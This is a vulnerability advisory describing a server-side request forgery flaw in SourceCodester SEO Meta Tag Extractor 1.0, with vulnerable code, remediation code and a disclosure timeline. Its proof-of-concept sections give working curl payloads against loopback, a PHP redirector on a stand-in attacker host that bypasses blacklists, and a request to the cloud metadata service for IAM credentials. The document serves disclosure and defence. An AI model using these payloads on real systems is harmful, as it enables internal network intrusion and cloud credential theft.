# SourceCodester SEO Meta Tag Extractor 1.0 - Server-Side Request Forgery via URL Parameter
## Vulnerability Information
| Field | Detail |
|-------------|----------------------------------------------|
| **Product** | SEO Meta Tag Extractor |
| **Vendor** | SourceCodester (Author: rems / remyandrade) |
| **Version** | 1.0 |
| **Type** | Server-Side Request Forgery (CWE-918) |
| **Author** | Kevin Chiang |
| **Date** | 2026-05-11 |
| **CVSS** | 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |
---
## Affected Component
- **Entry Endpoint**: `index.php` (POST handler)
- **Vulnerable Function**: `fetchMetaTags($url)`
- **Sink #1**: `get_headers($url, 1)` at `index.php:8`
- **Sink #2**: `file_get_contents($url)` at `index.php:13`
- **Parameter**: `url` (application/x-www-form-urlencoded, POST)
---
## Description
A server-side request forgery vulnerability was found in SourceCodester
SEO Meta Tag Extractor 1.0. It affects the function `fetchMetaTags()` of
the file `index.php`. The application accepts a user-supplied URL via
the `url` POST parameter and passes it directly to `get_headers()` and
`file_get_contents()` without any restriction against private, loopback,
or link-local IP ranges. The only validation performed is
`FILTER_VALIDATE_URL`, which checks syntactic URL validity but does not
block internal addresses. In addition, `file_get_contents()` follows
HTTP redirects by default, allowing an attacker-controlled external URL
to redirect the server-side fetch to an internal endpoint, bypassing any
naive hostname/IP blacklist that may be added later.
The root cause is that the destination address of the
attacker-controlled URL is never validated before the server connects
to it:
```php
// index.php (line 3-13)
function fetchMetaTags($url) {
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        return ['error' => 'Invalid URL format'];
    }
    $headers = get_headers($url, 1);            // SINK #1
    if (strpos($headers[0], '200') === false) {
        return ['error' => 'URL not reachable'];
    }
    $html = @file_get_contents($url);           // SINK #2
    ...
}
```
The fields parsed from the fetched HTML (title, meta description, OG
tags, links) are then echoed back to the attacker in the result page,
which makes this a read-capable SSRF rather than a blind one.

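To make the limitation of the format check concrete, the following minimal sketch runs `filter_var()` with `FILTER_VALIDATE_URL` over a few sample inputs. The helper name `passesFormatCheck()` and the sample URLs other than the PoC loopback address are illustrative assumptions and do not come from the application.

```php
<?php
// Sketch: FILTER_VALIDATE_URL checks URL syntax only; it says nothing
// about where the host points. Sample inputs are illustrative.
$samples = [
    'http://127.0.0.1:9999/',                   // loopback (PoC target)
    'http://169.254.169.254/latest/meta-data/', // link-local metadata address
    'http://10.0.0.5/admin',                    // RFC 1918 (hypothetical host)
    'not a url',                                // no scheme or host
];

// Hypothetical helper mirroring the only check the application performs.
function passesFormatCheck(string $url): bool
{
    return filter_var($url, FILTER_VALIDATE_URL) !== false;
}

foreach ($samples as $url) {
    printf("%-45s %s\n", $url, passesFormatCheck($url) ? 'accepted' : 'rejected');
}
```

All three internal addresses are accepted because they are well-formed URLs; only the malformed string is rejected.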
---
## Steps to Reproduce
### Environment
- OS: Ubuntu 22.04 LTS
- Web Server: PHP 8.1.2 built-in development server
- PHP: 8.1.2
- Test URL: `http://192.168.2.132:8080/`
### Steps
1. Deploy SEO Meta Tag Extractor 1.0 on a host that can reach an
internal service unavailable to external clients (e.g., a Python HTTP
server, admin panel, or Redis instance bound to the loopback
interface, or the cloud metadata service at `169.254.169.254`).
2. Start the vulnerable application:
```bash
cd seo-meta-tag-extractor/
php -S 0.0.0.0:8080
```
3. From an external host, verify the internal service is NOT directly
reachable:
```bash
curl http://192.168.2.132:9999/ # → connection refused
```
4. Submit the SSRF payload to the vulnerable application:
```bash
curl -X POST 'http://192.168.2.132:8080/' \
--data-urlencode 'url=http://127.0.0.1:9999/'
```
5. Observe that the HTTP response body contains content fetched from
`127.0.0.1:9999` (title, meta tags, etc.) - the server made the
request on behalf of the attacker.
---
## Proof of Concept
### Simulated Internal Service
On the victim host, run a service bound to loopback only:
```bash
mkdir -p /tmp/internal && cd /tmp/internal
cat > index.html <<'EOF'
<!DOCTYPE html>
<html><head>
<title>INTERNAL SECRET PAGE</title>
<meta name="description" content="Bound to 127.0.0.1 only.">
<meta name="keywords" content="admin,DB-password=hunter2,internal">
</head><body><h1>SSRF success</h1></body></html>
EOF
# --bind 127.0.0.1 → reachable only from the host itself (including PHP), NOT from the external network
python3 -m http.server 9999 --bind 127.0.0.1
```
### Vulnerable HTTP Request
```http
POST /index.php HTTP/1.1
Host: 192.168.2.132:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

url=http%3A%2F%2F127.0.0.1%3A9999%2F
```
### cURL PoC
```bash
# 1. Confirm internal service is not externally accessible
curl --max-time 3 http://192.168.2.132:9999/
# → curl: (7) Failed to connect ...
# 2. Trigger SSRF via the vulnerable application
curl -s -X POST 'http://192.168.2.132:8080/' \
     --data-urlencode 'url=http://127.0.0.1:9999/' \
  | grep -i 'INTERNAL SECRET'
# → <span class="meta-value">INTERNAL SECRET PAGE</span>
```
### Expected Result
The HTTP response from the vulnerable application contains the title
`INTERNAL SECRET PAGE` and other metadata fetched from the loopback-only
service, proving that the server-side request was successfully made on
behalf of an unauthenticated remote attacker.
### Redirect Bypass PoC (defeats naive IP blacklists)
Host a 302 redirector under attacker control:
```php
<?php
// redir.php on attacker.example
header("Location: http://127.0.0.1:9999/");
exit;
```
Then submit the public URL:
```bash
curl -X POST 'http://192.168.2.132:8080/' \
--data-urlencode 'url=http://attacker.example/redir.php'
```
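`file_get_contents()` follows the 302 and fetches the internal
resource even though the submitted URL itself would pass a blacklist
check. Because `get_headers()` also follows redirects and places the
first response's status line in `$headers[0]`, the redirector may need
to answer the application's initial `get_headers()` request with a
`200` and issue the 302 only on the subsequent fetch for the `200`
check to pass.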
### Cloud Metadata Attack (deployment-dependent)
When deployed on AWS EC2 without IMDSv2 enforced:
```bash
curl -X POST 'http://<target>/index.php' \
--data-urlencode 'url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
```
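The metadata endpoint responds with the IAM role name, which can be
chained with a second request to retrieve temporary credentials.
Because the metadata service returns plain text rather than HTML, how
much of the response surfaces in the application's output depends on
which extracted fields the non-HTML body ends up in.
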
---
## Code Flow
```
[Remote Attacker]
│
│ POST /index.php (url=http://127.0.0.1:9999/)
↓
fetchMetaTags($url) index.php:3
│
│ filter_var($url, FILTER_VALIDATE_URL)
│ └─ syntactic check only; private IPs PASS
│
↓
get_headers($url, 1) index.php:8 【SINK #1】
│ PHP issues HTTP request to 127.0.0.1:9999
│
↓
file_get_contents($url) index.php:13 【SINK #2】
│ PHP fetches response body
│ (follows HTTP 3xx redirects by default)
│
↓
DOMDocument::loadHTML($html) index.php:18-19
│ Parses internal-only content
│
↓
Echo extracted meta tags back to attacker index.php:117-217
│ title, description, OG/Twitter cards, canonical, h1, etc.
↓
Internal data exposed to unauthenticated remote attacker
```
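The parsing and echo stages of this flow can be illustrated offline. The sketch below feeds the simulated internal page from the PoC section into `DOMDocument` and pulls out the title and named meta tags. The helper `extractMeta()` and its return shape are assumptions for illustration, since the application's own extraction code is not reproduced in this advisory.

```php
<?php
// Sketch only: extractMeta() is a hypothetical helper, not the
// application's actual code. Requires the PHP DOM extension.
function extractMeta(string $html): array
{
    $doc = new DOMDocument();

    // Collect libxml parse warnings internally instead of emitting them.
    $previous = libxml_use_internal_errors(true);
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $result = ['title' => null, 'meta' => []];

    $titles = $doc->getElementsByTagName('title');
    if ($titles->length > 0) {
        $result['title'] = trim($titles->item(0)->textContent);
    }

    // Keep only <meta> elements that carry a name attribute.
    foreach ($doc->getElementsByTagName('meta') as $meta) {
        $name = $meta->getAttribute('name');
        if ($name !== '') {
            $result['meta'][$name] = $meta->getAttribute('content');
        }
    }
    return $result;
}

// The simulated internal page from the PoC section.
$internalHtml = <<<'HTML'
<!DOCTYPE html>
<html><head>
<title>INTERNAL SECRET PAGE</title>
<meta name="description" content="Bound to 127.0.0.1 only.">
<meta name="keywords" content="admin,DB-password=hunter2,internal">
</head><body><h1>SSRF success</h1></body></html>
HTML;

print_r(extractMeta($internalHtml));
```

Any value that lands in one of these fields, such as the `keywords` content above, is returned to whoever submitted the URL.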
---
## Impact
An unauthenticated remote attacker can:
- Probe internal/private network services not reachable from the
public Internet (loopback, RFC 1918, link-local).
- Read responses from internal HTTP-speaking services through the
echoed meta-tag output (full read-capable SSRF).
- Enumerate open ports on the host and adjacent network by comparing
the `URL not reachable` vs successful response branches.
- On cloud deployments without IMDSv2 enforcement, retrieve cloud
instance metadata (e.g., AWS IMDS at `169.254.169.254`) including
temporary IAM credentials, escalating to cloud account compromise.
- Bypass IP-based access control on internal admin panels that trust
`127.0.0.1` or the host's primary interface.
- Defeat naive URL blacklists by using attacker-controlled HTTP
redirects to internal addresses.
---
## Remediation
The recommended fix combines four controls in `fetchMetaTags()`:
1. **Scheme allowlist**: accept only `http` and `https` (the existing
regex on `index.php:64` also allows `ftp` / `ftps`).
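2. **Hostname resolution + IP allowlist**: resolve the hostname and
reject any address inside private, loopback, link-local, or multicast
ranges (RFC 1918, `127.0.0.0/8`, `169.254.0.0/16`, `::1`, `fc00::/7`,
etc.). Note that `gethostbynamel()` returns IPv4 addresses only;
covering the IPv6 ranges requires an additional AAAA lookup, e.g.
`dns_get_record($host, DNS_AAAA)`.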
3. **Disable HTTP redirect following**: use a custom stream context
with `'follow_location' => 0`, and re-validate the redirect target
against the same allowlist for each hop.
4. **Set request timeout and max content length** to limit abuse for
port scanning and denial-of-service.
Example patch sketch:
```php
function isPublicUrl($url) {
    $parts = parse_url($url);
    if (!$parts || !in_array(strtolower($parts['scheme'] ?? ''),
                             ['http', 'https'])) {
        return false;
    }
    $ips = gethostbynamel($parts['host'] ?? '');
    if (!$ips) return false;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                       FILTER_FLAG_NO_PRIV_RANGE
                       | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}
```
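Controls 3 and 4 can be sketched along the same lines. The following is a minimal illustration, not a drop-in patch: the helper names (`isPublicIp()`, `isPublicHttpUrl()`, `buildFetchContext()`, `findRedirectTarget()`, `safeFetch()`), the 5-second timeout, the 1 MiB cap, and the 3-hop limit are all assumptions chosen for the example.

```php
<?php
// Sketch of controls 3 and 4. All names and limits are illustrative.
const MAX_BYTES = 1048576; // cap on bytes read from a response body
const MAX_HOPS  = 3;       // redirects we are willing to re-validate

function isPublicIp(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function isPublicHttpUrl(string $url): bool
{
    $parts = parse_url($url);
    if (!$parts || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return false;
    }
    $ips = gethostbynamel($parts['host'] ?? ''); // IPv4 addresses only
    if (!$ips) {
        return false;
    }
    foreach ($ips as $ip) {
        if (!isPublicIp($ip)) {
            return false;
        }
    }
    return true;
}

function buildFetchContext()
{
    return stream_context_create(['http' => [
        'follow_location' => 0,   // never follow 3xx automatically
        'timeout'         => 5.0, // read timeout in seconds
    ]]);
}

// Returns the Location value of a 3xx response, or null otherwise.
function findRedirectTarget(array $headerLines): ?string
{
    if (!preg_match('#^HTTP/\S+\s+3\d\d#', $headerLines[0] ?? '')) {
        return null;
    }
    foreach ($headerLines as $line) {
        if (stripos($line, 'Location:') === 0) {
            return trim(substr($line, strlen('Location:')));
        }
    }
    return null;
}

function safeFetch(string $url): ?string
{
    for ($hop = 0; $hop <= MAX_HOPS; $hop++) {
        if (!isPublicHttpUrl($url)) {
            return null; // rejected before any request is sent
        }
        $http_response_header = []; // reset; the HTTP wrapper refills it
        $body = @file_get_contents($url, false, buildFetchContext(), 0, MAX_BYTES);
        $next = findRedirectTarget($http_response_header);
        if ($next === null) {
            return $body === false ? null : $body;
        }
        $url = $next; // the next iteration re-validates the redirect target
    }
    return null; // too many redirects
}
```

In this sketch a relative `Location` value fails the scheme check and is rejected. The hostname is also resolved separately from the actual fetch, so the sketch does not by itself close a DNS rebinding window; pinning the validated address (for example with cURL's `CURLOPT_RESOLVE`) would be one way to address that.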
---
## Vendor Notification
| Date       | Action                                          |
|------------|-------------------------------------------------|
| 2026-05-11 | Vendor notified via SourceCodester contact form |
---
## References
- Vendor homepage: https://www.sourcecodester.com/
- Project page: https://www.sourcecodester.com/php/18271/seo-meta-tag-extractor-using-php-and-javascript-source-code.html
- Author page: https://www.sourcecodester.com/users/remyandrade
- Related CWE: CWE-918 (Server-Side Request Forgery)
- Related CWE: CWE-441 (Unintended Proxy or Intermediary - 'Confused Deputy')